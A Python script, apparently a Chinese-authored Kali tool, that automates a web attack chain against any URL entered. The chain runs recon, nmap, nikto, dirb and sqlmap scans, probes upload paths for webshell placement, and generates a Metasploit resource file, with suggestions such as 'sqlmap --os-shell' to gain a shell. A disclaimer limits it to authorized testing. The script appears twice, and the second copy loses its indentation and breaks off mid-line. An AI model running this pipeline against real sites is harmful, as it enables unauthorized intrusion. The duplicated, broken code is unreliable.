#!/usr/bin/env python3
# 帝兵-筷子 | Kali Web渗透全自动平台
# 作者: 跨紫大帝
# 警告:仅用于授权的安全测试和教育目的
import os
import sys
import subprocess
import time
import threading
import json
from datetime import datetime
from urllib.parse import urlparse
# 颜色代码
class Colors:
    """ANSI SGR escape sequences used to colour terminal output.

    The colour members select a bright (high-intensity) foreground colour,
    ``BOLD`` turns on the bold attribute and ``END`` resets all attributes.
    """

    # Bright foreground colours (SGR 91–96).
    RED, GREEN, YELLOW, BLUE, PURPLE, CYAN = (
        '\033[91m', '\033[92m', '\033[93m', '\033[94m', '\033[95m', '\033[96m',
    )
    # Text attributes.
    BOLD = '\033[1m'
    END = '\033[0m'
# 全局变量
# Mutable module-level state shared by the stage functions.
TARGET_URL = ""     # target URL as entered by the operator; set by run_full_automation
SCAN_RESULTS = {}   # per-tool findings keyed by tool name; read by save_final_report
CURRENT_STAGE = ""  # label of the stage currently running; used in status lines
def print_banner():
    """Clear the terminal and print the tool's colour banner.

    Side effects only: spawns ``clear`` via ``os.system`` and writes the
    banner to stdout.  Returns nothing.
    """
    os.system("clear")
    rule = '=' * 65
    banner_lines = [
        f"{Colors.CYAN}{Colors.BOLD}{rule}",
        " ╔══════════════════════════════════════╗",
        " ║ 帝兵-筷子 | 全自动渗透平台 ║",
        " ║ ONE-URL TO SHELL AUTOMATION FRAMEWORK ║",
        " ╚══════════════════════════════════════╝",
        f"{rule}{Colors.END}",
        f"{Colors.YELLOW} Kali Linux 全自动Web渗透测试工具",
        f"{Colors.GREEN} 作者: 跨紫大帝",
        f"{Colors.RED} 警告:仅用于授权测试,请勿非法使用",
        f"{Colors.CYAN}{rule}{Colors.END}\n",
    ]
    # One write instead of ten; the joined text is byte-identical to the
    # sequence of individual prints.
    print("\n".join(banner_lines))
def print_status(stage, message):
    """Print one timestamped status line: ``[HH:MM:SS] [stage] message``."""
    now = datetime.now().strftime("%H:%M:%S")
    time_tag = f"{Colors.BLUE}[{now}]{Colors.END}"
    stage_tag = f"{Colors.YELLOW}[{stage}]{Colors.END}"
    # print's default separator supplies the single spaces between the parts.
    print(time_tag, stage_tag, message)
def print_success(message):
    """Print *message* in green, prefixed with a ``[✓]`` marker."""
    text = f"[✓] {message}"
    print(Colors.GREEN + text + Colors.END)
def print_error(message):
    """Print *message* in red, prefixed with a ``[✗]`` marker."""
    text = f"[✗] {message}"
    print(Colors.RED + text + Colors.END)
def print_warning(message):
    """Print *message* in yellow, prefixed with a ``[!]`` marker."""
    text = f"[!] {message}"
    print(Colors.YELLOW + text + Colors.END)
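def check_tools():
    """Check that the external tools this script drives are available on PATH.

    Prints one line per tool and, when something is missing, an ``apt``
    install hint.  Presence is decided with ``shutil.which`` rather than by
    running each tool's ``--version``: it answers the same question (is an
    executable of that name on PATH) without spawning five processes, and the
    previous bare ``except:`` around those runs also swallowed
    ``KeyboardInterrupt``.

    Returns:
        True when every required tool was found, False otherwise.
    """
    import shutil  # local import keeps this fix self-contained

    required_tools = ('nmap', 'sqlmap', 'dirb', 'nikto', 'whatweb')
    print_status("系统检查", "检查Kali工具依赖...")
    missing_tools = []
    for tool in required_tools:
        if shutil.which(tool) is None:
            missing_tools.append(tool)
            print_error(f"{tool} 未安装")
        else:
            print_success(f"{tool} 已安装")
    if missing_tools:
        print_warning(f"缺少工具: {', '.join(missing_tools)}")
        print_warning("请运行: sudo apt install " + " ".join(missing_tools))
        return False
    return True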
def extract_domain(url):
    """Return the network-location part (``netloc``) of *url*.

    ``urlparse`` hands back ``netloc`` exactly as written, so the result may
    still carry a port (``host:8080``) or user info; callers that build
    host-only commands from it should keep that in mind.  A string without a
    scheme (``example.com``) yields an empty string.
    """
    return urlparse(url).netloc
def stage_1_reconnaissance():
    """Stage 1: information gathering.

    Runs ``whois``, ``whatweb`` and ``nmap`` against the module-level
    ``TARGET_URL`` and stores their text output in ``SCAN_RESULTS`` under the
    keys ``'whois'``, ``'whatweb'`` and ``'nmap'``.  Each tool has its own
    ``try`` block, so one failing tool does not stop the others.

    NOTE(review): every command below is assembled by string interpolation
    and executed with ``shell=True``; a URL containing shell metacharacters
    is therefore interpreted by the operator's own shell.  Passing an
    argument list with ``shell=False`` would close that hole.
    """
    global CURRENT_STAGE
    CURRENT_STAGE = "信息收集"
    # netloc as written in the URL; may still include a port (host:8080).
    domain = extract_domain(TARGET_URL)
    # 1. Whois lookup
    print_status(CURRENT_STAGE, f"执行Whois查询: {domain}")
    try:
        result = subprocess.run(f"whois {domain}", shell=True, capture_output=True, text=True, timeout=30)
        SCAN_RESULTS['whois'] = result.stdout[:1000]  # keep only the first 1000 characters
        print_success("Whois查询完成")
    except Exception as e:
        print_error(f"Whois查询失败: {e}")
    # 2. WhatWeb technology fingerprinting
    print_status(CURRENT_STAGE, "Web技术指纹识别...")
    try:
        result = subprocess.run(f"whatweb {TARGET_URL} -v", shell=True, capture_output=True, text=True, timeout=60)
        SCAN_RESULTS['whatweb'] = result.stdout
        print_success("指纹识别完成")
    except Exception as e:
        print_error(f"WhatWeb扫描失败: {e}")
    # 3. Nmap port scan
    print_status(CURRENT_STAGE, "Nmap端口扫描...")
    try:
        # Fast scan of the common ports only (-F); the report is written to
        # nmap_scan.txt in the current working directory.
        cmd = f"nmap -sS -T4 -F --open {domain} -oN nmap_scan.txt"
        # The exit status is not checked: a failed run (e.g. -sS without
        # raw-socket privileges) only surfaces below if the report is missing.
        subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, timeout=120)
        print_success("端口扫描完成")
        # Read the scan report back in
        with open('nmap_scan.txt', 'r') as f:
            SCAN_RESULTS['nmap'] = f.read()
    except Exception as e:
        print_error(f"Nmap扫描失败: {e}")
def stage_2_vulnerability_scan():
    """Stage 2: vulnerability scanning.

    Runs ``nikto`` (up to 5 minutes) and ``dirb`` (up to 3 minutes) against
    ``TARGET_URL``.  Each tool writes its own report file into the current
    working directory, which is then read back into ``SCAN_RESULTS`` under
    ``'nikto'`` and ``'dirb'``.

    NOTE(review): as in stage 1, both commands are interpolated strings run
    with ``shell=True``, so the URL is exposed to the operator's shell.
    """
    global CURRENT_STAGE
    CURRENT_STAGE = "漏洞扫描"
    # 1. Nikto web vulnerability scan
    print_status(CURRENT_STAGE, "Nikto Web漏洞扫描...")
    try:
        cmd = f"nikto -h {TARGET_URL} -o nikto_scan.txt -Format txt"
        process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        # Progress hint for the operator
        print(f"{Colors.CYAN}[进行中]{Colors.END} Nikto扫描可能需要几分钟...")
        # Timeout handling
        try:
            # stdout/stderr are captured but never used; the result is taken
            # from the -o report file instead.
            stdout, stderr = process.communicate(timeout=300)  # 5-minute timeout
            print_success("Nikto扫描完成")
            # A missing report raises FileNotFoundError, which is handled by
            # the outer except below.
            with open('nikto_scan.txt', 'r') as f:
                SCAN_RESULTS['nikto'] = f.read()
        except subprocess.TimeoutExpired:
            process.kill()
            # NOTE(review): the subprocess docs recommend a second
            # communicate() after kill() so the pipes are drained and the
            # child is reaped.
            print_warning("Nikto扫描超时")
    except Exception as e:
        print_error(f"Nikto扫描失败: {e}")
    # 2. DIRB directory enumeration
    print_status(CURRENT_STAGE, "DIRB目录枚举...")
    try:
        # Small wordlist for a quick pass
        cmd = f"dirb {TARGET_URL} /usr/share/dirb/wordlists/small.txt -o dirb_scan.txt"
        subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, timeout=180)
        print_success("目录枚举完成")
        with open('dirb_scan.txt', 'r') as f:
            SCAN_RESULTS['dirb'] = f.read()
    except Exception as e:
        print_error(f"DIRB扫描失败: {e}")
def stage_3_automated_exploitation():
    """Stage 3: automated SQL injection detection via ``sqlmap``.

    Starts ``sqlmap`` in batch mode, echoes selected output lines as they
    arrive, and stores the most recent line containing ``back-end DBMS`` in
    ``SCAN_RESULTS['sqlmap_db']`` (each later match overwrites the previous
    one).  sqlmap's own output goes to ``sqlmap_results`` under the current
    working directory.
    """
    global CURRENT_STAGE
    CURRENT_STAGE = "自动化攻击"
    domain = extract_domain(TARGET_URL)  # NOTE(review): assigned but never used in this stage
    # Automated SQL injection detection
    print_status(CURRENT_STAGE, "自动化SQL注入检测...")
    try:
        # Basic sqlmap detection in batch (non-interactive) mode.
        # NOTE(review): the URL is single-quoted but still passed through
        # shell=True, so a quote character in it breaks out of the quoting.
        cmd = f"sqlmap -u '{TARGET_URL}' --batch --crawl=2 --risk=2 --level=2 --output-dir=sqlmap_results"
        print(f"{Colors.YELLOW}[注意]{Colors.END} SQLMap检测可能需要较长时间...")
        print(f"{Colors.CYAN}执行命令: {cmd}{Colors.END}")
        # Start the sqlmap process
        process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
        # Live output: only lines mentioning a URL, an injection or a payload
        # are echoed to the operator.
        print(f"\n{Colors.PURPLE}[SQLMap实时输出]{Colors.END}")
        for line in process.stdout:
            if "URL" in line or "injection" in line.lower() or "payload" in line:
                print(f" {Colors.CYAN}{line.strip()}{Colors.END}")
            if "back-end DBMS" in line:
                print_success(f"发现数据库: {line.strip()}")
                SCAN_RESULTS['sqlmap_db'] = line.strip()
            time.sleep(0.1)
        # NOTE(review): stderr is a PIPE that is never read; if the child
        # writes enough there it can block before stdout is fully drained.
        process.wait()
        print_success("SQL注入检测完成")
    except Exception as e:
        print_error(f"SQLMap执行失败: {e}")
def stage_4_webshell_deployment():
    """Stage 4: probe a fixed list of upload-related paths with ``curl``.

    For each path only the HTTP status code is fetched; 200, 403, 301 or 302
    is treated as "path present" and recorded in
    ``SCAN_RESULTS['upload_points']`` as ``(path, status)`` tuples.  Despite
    the stage name, nothing is uploaded here.

    NOTE(review): a redirect or 403 shows only that the server answered for
    that path (some servers do so for every unknown path), so the result is
    a candidate list, not a confirmed finding.
    """
    global CURRENT_STAGE
    CURRENT_STAGE = "WebShell部署"
    print_status(CURRENT_STAGE, "尝试常见WebShell上传点...")
    # Fixed list of commonly used upload paths
    common_upload_paths = [
        '/upload.php', '/admin/upload.php', '/wp-admin/async-upload.php',
        '/filemanager/upload.php', '/inc/upload.php', '/uploads/'
    ]
    # Check each candidate path
    upload_points_found = []
    for path in common_upload_paths:
        test_url = f"{TARGET_URL.rstrip('/')}{path}"
        print_status("检测", f"检查 {path}")
        try:
            # curl prints only the status code (-w '%{http_code}') and
            # discards the body.  The URL is unquoted inside a shell=True
            # command, and there is no Python-side timeout here, only curl's
            # --connect-timeout.
            cmd = f"curl -s -o /dev/null -w '%{{http_code}}' {test_url} --connect-timeout 5"
            result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
            if result.stdout in ['200', '403', '301', '302']:
                upload_points_found.append((path, result.stdout))
                print_success(f"找到上传点: {path} (HTTP {result.stdout})")
        except:
            # NOTE(review): bare except also swallows KeyboardInterrupt;
            # `except OSError:` would still cover a missing curl binary.
            pass
    if upload_points_found:
        SCAN_RESULTS['upload_points'] = upload_points_found
        print_success(f"发现 {len(upload_points_found)} 个可能的上传点")
    else:
        print_warning("未发现常见的上传点")
def stage_5_shell_attempt():
    """Stage 5: write a Metasploit resource script and point the operator at it.

    Nothing is executed in this stage: the template below is rendered with the
    target's netloc, saved as ``autopwn.rc`` in the current working directory,
    and two manual follow-up commands are printed.  The ``#`` lines inside the
    template are part of the file content, not Python comments.
    """
    global CURRENT_STAGE
    CURRENT_STAGE = "Shell获取"
    print_status(CURRENT_STAGE, "执行Metasploit自动化攻击...")
    # Render the Metasploit resource script
    msf_script = """
# 帝兵-筷子自动化攻击脚本
use auxiliary/scanner/http/dir_scanner
set RHOSTS {domain}
set RPORT 80
set THREADS 10
run
use auxiliary/scanner/http/http_version
set RHOSTS {domain}
run
# 尝试基于发现的漏洞进行攻击
# 注:实际攻击模块需要根据扫描结果动态选择
""".format(domain=extract_domain(TARGET_URL))
    # Save the script (overwrites any existing autopwn.rc in the CWD)
    with open('autopwn.rc', 'w') as f:
        f.write(msf_script)
    print_warning("需要手动执行: msfconsole -r autopwn.rc")
    print_warning("或使用浏览器攻击: use exploit/multi/browser/chrome_cve_2024_0519")
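def save_final_report():
    """Write a Markdown summary of ``SCAN_RESULTS`` and return its file name.

    The report is created in the current working directory as
    ``渗透报告_<netloc>_<YYYYmmdd_HHMMSS>.md``.  Only the keys this script
    itself stores (``whois``, ``nikto``, ``sqlmap_db``, ``upload_points``) are
    consulted; a missing key is reported as that stage having failed or not
    run.

    Returns:
        The name of the report file that was written.
    """
    # One timestamp for both the file name and the header so they agree.
    now = datetime.now()
    timestamp = now.strftime("%Y%m%d_%H%M%S")
    filename = f"渗透报告_{extract_domain(TARGET_URL)}_{timestamp}.md"
    # Explicit UTF-8: the report contains non-ASCII headings and the locale
    # default encoding is not guaranteed to handle them.
    with open(filename, 'w', encoding='utf-8') as f:
        f.write("# 帝兵-筷子渗透测试报告\n\n")
        f.write(f"**目标URL**: {TARGET_URL}\n")
        f.write(f"**扫描时间**: {now.strftime('%Y-%m-%d %H:%M:%S')}\n")
        f.write("**工具版本**: 帝兵-筷子 v2.0\n\n")
        f.write("## 扫描摘要\n")
        f.write(f"- 信息收集阶段: {'完成' if 'whois' in SCAN_RESULTS else '失败'}\n")
        f.write(f"- 漏洞扫描阶段: {'完成' if 'nikto' in SCAN_RESULTS else '失败'}\n")
        f.write(f"- 自动化攻击: {'尝试执行' if 'sqlmap_db' in SCAN_RESULTS else '未执行'}\n\n")
        if 'upload_points' in SCAN_RESULTS:
            f.write("## 发现的上传点\n")
            for path, code in SCAN_RESULTS['upload_points']:
                f.write(f"- `{path}` (HTTP {code})\n")
        if 'sqlmap_db' in SCAN_RESULTS:
            f.write("\n## SQL注入检测结果\n")
            f.write(f"{SCAN_RESULTS['sqlmap_db']}\n")
    # The previous message never named the file; report the real path so the
    # operator can find it.
    print_success(f"报告已保存: {filename}")
    return filename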
def run_full_automation(url):
    """Run the whole pipeline against *url*: banner, tool check, five stages, report.

    Sets the module-level ``TARGET_URL`` and resets ``SCAN_RESULTS`` before
    starting.  Returns early, without a report, when ``check_tools`` fails.
    A stage that raises is reported and skipped; the remaining stages still
    run, and the report is built from whatever ``SCAN_RESULTS`` contains.
    """
    global TARGET_URL, SCAN_RESULTS
    TARGET_URL = url
    SCAN_RESULTS = {}
    print_banner()
    print(f"{Colors.GREEN}{'='*65}{Colors.END}")
    print(f"{Colors.CYAN}{Colors.BOLD}目标URL: {TARGET_URL}{Colors.END}")
    print(f"{Colors.GREEN}{'='*65}{Colors.END}\n")
    # Check tool dependencies
    if not check_tools():
        print_error("缺少必要工具,请先安装")
        return
    # Run the five stages in order
    stages = [
        ("第一阶段", "信息收集", stage_1_reconnaissance),
        ("第二阶段", "漏洞扫描", stage_2_vulnerability_scan),
        ("第三阶段", "自动化攻击", stage_3_automated_exploitation),
        ("第四阶段", "WebShell部署", stage_4_webshell_deployment),
        ("第五阶段", "Shell获取", stage_5_shell_attempt)
    ]
    start_time = time.time()
    for stage_num, stage_name, stage_func in stages:
        print(f"\n{Colors.PURPLE}{'='*50}{Colors.END}")
        print(f"{Colors.CYAN}{Colors.BOLD}{stage_num}: {stage_name}{Colors.END}")
        print(f"{Colors.PURPLE}{'='*50}{Colors.END}")
        try:
            stage_func()
        except Exception as e:
            # Keep going: a later stage may still produce results.
            print_error(f"阶段执行失败: {e}")
            continue
    # Generate the report
    print(f"\n{Colors.GREEN}{'='*50}{Colors.END}")
    print(f"{Colors.CYAN}{Colors.BOLD}扫描完成!{Colors.END}")
    print(f"{Colors.GREEN}{'='*50}{Colors.END}")
    total_time = time.time() - start_time
    print_success(f"总执行时间: {total_time:.1f}秒")
    save_final_report()
    # Follow-up suggestions, driven by which keys the stages stored
    print(f"\n{Colors.YELLOW}{'='*50}{Colors.END}")
    print(f"{Colors.CYAN}{Colors.BOLD}后续行动建议:{Colors.END}")
    print(f"{Colors.YELLOW}{'='*50}{Colors.END}")
    if 'sqlmap_db' in SCAN_RESULTS:
        print(f"1. {Colors.GREEN}发现SQL注入漏洞,可进一步利用:{Colors.END}")
        print(f" sqlmap -u '{TARGET_URL}' --os-shell")
    if 'upload_points' in SCAN_RESULTS:
        print(f"2. {Colors.GREEN}发现上传点,尝试WebShell上传:{Colors.END}")
        for path, _ in SCAN_RESULTS['upload_points']:
            print(f" 上传地址: {TARGET_URL.rstrip('/')}{path}")
    print(f"3. {Colors.YELLOW}手动渗透测试建议:{Colors.END}")
    print(f" - 使用Burp Suite进行深入测试")
    print(f" - 检查发现的敏感目录")
    print(f" - 尝试默认凭证登录")
def main():
    """Interactive entry point: ask for a target URL, confirm, then run the pipeline."""
    print_banner()
    # Prompt for the target URL
    rule = '=' * 65
    print(f"{Colors.CYAN}{rule}{Colors.END}")
    url = input(f"{Colors.GREEN}请输入目标URL (如 http://target.com): {Colors.END}").strip()
    # A bare host name is treated as plain HTTP.
    has_scheme = url.startswith(('http://', 'https://'))
    if not has_scheme:
        url = f"http://{url}"
    # Ask for confirmation before anything is launched
    print(f"\n{Colors.RED}⚠️ 警告: 这将启动全自动渗透测试{Colors.END}")
    print(f"{Colors.YELLOW}目标: {url}{Colors.END}")
    answer = input(f"{Colors.GREEN}是否开始? (y/N): {Colors.END}").lower()
    if answer != 'y':
        print(f"{Colors.YELLOW}操作已取消{Colors.END}")
        return
    run_full_automation(url)
if __name__ == "__main__":
    # Top-level guard: Ctrl-C exits quietly and any other error is printed
    # through print_error instead of surfacing as a traceback.
    try:
        main()
        print(f"\n{Colors.CYAN}感谢使用帝兵-筷子全自动平台!{Colors.END}")
    except KeyboardInterrupt:
        print(f"\n{Colors.YELLOW}程序被用户中断{Colors.END}")
    except Exception as e:
        print_error(f"程序执行出错: {e}")
# 帝兵-筷子 | Kali Web渗透全自动平台
# 作者: 跨紫大帝
# 警告:仅用于授权的安全测试和教育目的
import os
import sys
import subprocess
import time
import threading
import json
from datetime import datetime
from urllib.parse import urlparse
# 颜色代码
class Colors:
    """ANSI SGR escape sequences used to colour terminal output.

    The colour members select a bright (high-intensity) foreground colour,
    ``BOLD`` turns on the bold attribute and ``END`` resets all attributes.
    """

    # Bright foreground colours (SGR 91–96).
    RED, GREEN, YELLOW, BLUE, PURPLE, CYAN = (
        '\033[91m', '\033[92m', '\033[93m', '\033[94m', '\033[95m', '\033[96m',
    )
    # Text attributes.
    BOLD = '\033[1m'
    END = '\033[0m'
# 全局变量
# Mutable module-level state shared by the stage functions.
TARGET_URL = ""     # target URL as entered by the operator; set by run_full_automation
SCAN_RESULTS = {}   # per-tool findings keyed by tool name; read by save_final_report
CURRENT_STAGE = ""  # label of the stage currently running; used in status lines
def print_banner():
    """Clear the terminal and print the tool's colour banner.

    Side effects only: spawns ``clear`` via ``os.system`` and writes the
    banner to stdout.  Returns nothing.
    """
    os.system("clear")
    rule = '=' * 65
    banner_lines = [
        f"{Colors.CYAN}{Colors.BOLD}{rule}",
        " ╔══════════════════════════════════════╗",
        " ║ 帝兵-筷子 | 全自动渗透平台 ║",
        " ║ ONE-URL TO SHELL AUTOMATION FRAMEWORK ║",
        " ╚══════════════════════════════════════╝",
        f"{rule}{Colors.END}",
        f"{Colors.YELLOW} Kali Linux 全自动Web渗透测试工具",
        f"{Colors.GREEN} 作者: 跨紫大帝",
        f"{Colors.RED} 警告:仅用于授权测试,请勿非法使用",
        f"{Colors.CYAN}{rule}{Colors.END}\n",
    ]
    # One write instead of ten; the joined text is byte-identical to the
    # sequence of individual prints.
    print("\n".join(banner_lines))
def print_status(stage, message):
    """Print one timestamped status line: ``[HH:MM:SS] [stage] message``."""
    now = datetime.now().strftime("%H:%M:%S")
    time_tag = f"{Colors.BLUE}[{now}]{Colors.END}"
    stage_tag = f"{Colors.YELLOW}[{stage}]{Colors.END}"
    # print's default separator supplies the single spaces between the parts.
    print(time_tag, stage_tag, message)
def print_success(message):
    """Print *message* in green, prefixed with a ``[✓]`` marker."""
    text = f"[✓] {message}"
    print(Colors.GREEN + text + Colors.END)
def print_error(message):
    """Print *message* in red, prefixed with a ``[✗]`` marker."""
    text = f"[✗] {message}"
    print(Colors.RED + text + Colors.END)
def print_warning(message):
    """Print *message* in yellow, prefixed with a ``[!]`` marker."""
    text = f"[!] {message}"
    print(Colors.YELLOW + text + Colors.END)
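def check_tools():
    """Check that the external tools this script drives are available on PATH.

    Prints one line per tool and, when something is missing, an ``apt``
    install hint.  Presence is decided with ``shutil.which`` rather than by
    running each tool's ``--version``: it answers the same question (is an
    executable of that name on PATH) without spawning five processes, and the
    previous bare ``except:`` around those runs also swallowed
    ``KeyboardInterrupt``.

    Returns:
        True when every required tool was found, False otherwise.
    """
    import shutil  # local import keeps this fix self-contained

    required_tools = ('nmap', 'sqlmap', 'dirb', 'nikto', 'whatweb')
    print_status("系统检查", "检查Kali工具依赖...")
    missing_tools = []
    for tool in required_tools:
        if shutil.which(tool) is None:
            missing_tools.append(tool)
            print_error(f"{tool} 未安装")
        else:
            print_success(f"{tool} 已安装")
    if missing_tools:
        print_warning(f"缺少工具: {', '.join(missing_tools)}")
        print_warning("请运行: sudo apt install " + " ".join(missing_tools))
        return False
    return True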
def extract_domain(url):
    """Return the network-location part (``netloc``) of *url*.

    ``urlparse`` hands back ``netloc`` exactly as written, so the result may
    still carry a port (``host:8080``) or user info; callers that build
    host-only commands from it should keep that in mind.  A string without a
    scheme (``example.com``) yields an empty string.
    """
    return urlparse(url).netloc
def stage_1_reconnaissance():
    """Stage 1: information gathering.

    Runs ``whois``, ``whatweb`` and ``nmap`` against the module-level
    ``TARGET_URL`` and stores their text output in ``SCAN_RESULTS`` under the
    keys ``'whois'``, ``'whatweb'`` and ``'nmap'``.  Each tool has its own
    ``try`` block, so one failing tool does not stop the others.

    NOTE(review): every command below is assembled by string interpolation
    and executed with ``shell=True``; a URL containing shell metacharacters
    is therefore interpreted by the operator's own shell.  Passing an
    argument list with ``shell=False`` would close that hole.
    """
    global CURRENT_STAGE
    CURRENT_STAGE = "信息收集"
    # netloc as written in the URL; may still include a port (host:8080).
    domain = extract_domain(TARGET_URL)
    # 1. Whois lookup
    print_status(CURRENT_STAGE, f"执行Whois查询: {domain}")
    try:
        result = subprocess.run(f"whois {domain}", shell=True, capture_output=True, text=True, timeout=30)
        SCAN_RESULTS['whois'] = result.stdout[:1000]  # keep only the first 1000 characters
        print_success("Whois查询完成")
    except Exception as e:
        print_error(f"Whois查询失败: {e}")
    # 2. WhatWeb technology fingerprinting
    print_status(CURRENT_STAGE, "Web技术指纹识别...")
    try:
        result = subprocess.run(f"whatweb {TARGET_URL} -v", shell=True, capture_output=True, text=True, timeout=60)
        SCAN_RESULTS['whatweb'] = result.stdout
        print_success("指纹识别完成")
    except Exception as e:
        print_error(f"WhatWeb扫描失败: {e}")
    # 3. Nmap port scan
    print_status(CURRENT_STAGE, "Nmap端口扫描...")
    try:
        # Fast scan of the common ports only (-F); the report is written to
        # nmap_scan.txt in the current working directory.
        cmd = f"nmap -sS -T4 -F --open {domain} -oN nmap_scan.txt"
        # The exit status is not checked: a failed run (e.g. -sS without
        # raw-socket privileges) only surfaces below if the report is missing.
        subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, timeout=120)
        print_success("端口扫描完成")
        # Read the scan report back in
        with open('nmap_scan.txt', 'r') as f:
            SCAN_RESULTS['nmap'] = f.read()
    except Exception as e:
        print_error(f"Nmap扫描失败: {e}")
def stage_2_vulnerability_scan():
"""第二阶段:漏洞扫描"""
global CURRENT_STAGE
CURRENT_STAGE = "漏洞扫描"
# 1. Nikto漏洞扫描
print_status(CURRENT_STAGE, "Nikto Web漏洞扫描...")
try:
cmd = f"nikto -h {TARGET_URL} -o nikto_scan.txt -Format txt"
process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# 显示进度
print(f"{Colors.CYAN}[进行中]{Colors.END} Nikto扫描可能需要几分钟...")
# 超时设置
try:
stdout, stderr = process.communicate(timeout=300) # 5分钟超时
print_success("Nikto扫描完成")
with open('nikto_scan.txt', 'r') as f:
SCAN_RESULTS['nikto'] = f.read()
except subprocess.TimeoutExpired:
process.kill()
print_warning("Nikto扫描超时")
except Exception as e:
print_error(f"Nikto扫描失败: {e}")
# 2. DIRB目录爆破
print_status(CURRENT_STAGE, "DIRB目录枚举...")
try:
# 使用小字典快速扫描
cmd = f"dirb {TARGET_URL} /usr/share/dirb/wordlists/small.txt -o dirb_scan.txt"
subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, timeout=180)
print_s